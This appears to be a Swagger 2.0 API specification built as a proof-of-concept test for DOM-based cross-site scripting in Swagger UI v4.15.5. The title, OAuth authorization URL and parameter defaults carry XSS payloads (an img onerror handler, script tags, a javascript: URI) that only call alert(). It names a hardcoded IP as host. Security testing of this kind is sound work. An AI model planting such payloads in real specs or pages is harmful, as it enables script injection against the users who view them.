swagger: '2.0'
info:
  version: "1.0.0"
  title: "DOM XSS Testing Environment By Drocapy"
  description: "Target Audit - Swagger UI v4.15.5 <img src=x onerror=alert('Description_XSS')>"

host: "143.166.199.59"
basePath: "/api/v1"

securityDefinitions:
  OauthXSS:
    type: oauth2
    authorizationUrl: "javascript:alert('Authorize_Button_XSS')//"
    flow: implicit
    scopes:
      read: "Read Access"

paths:
  /avscanner/fileUploads:
    post:
      summary: "Upload test for parameters bypass"
      description: "Click Try it out to test array parameter rendering"
      operationId: "fileUploads"
      consumes:
        - "multipart/form-data"
      parameters:
        - name: "id"
          in: "path"
          required: true
          type: "array"
          items:
            type: "string"
          collectionFormat: "multi"
          default: 
            - "<script>alert('Array_Default_XSS_1')</script>"
            - "<img src=x onerror=alert('Array_Default_XSS_2')>"
        - name: "Context"
          in: "formData"
          required: true
          type: "string"
          default: "{\"SourceApplicationName\": \"Test\"}"
      responses:
        '200':
          description: "Success"

security:
  - OauthXSS: []
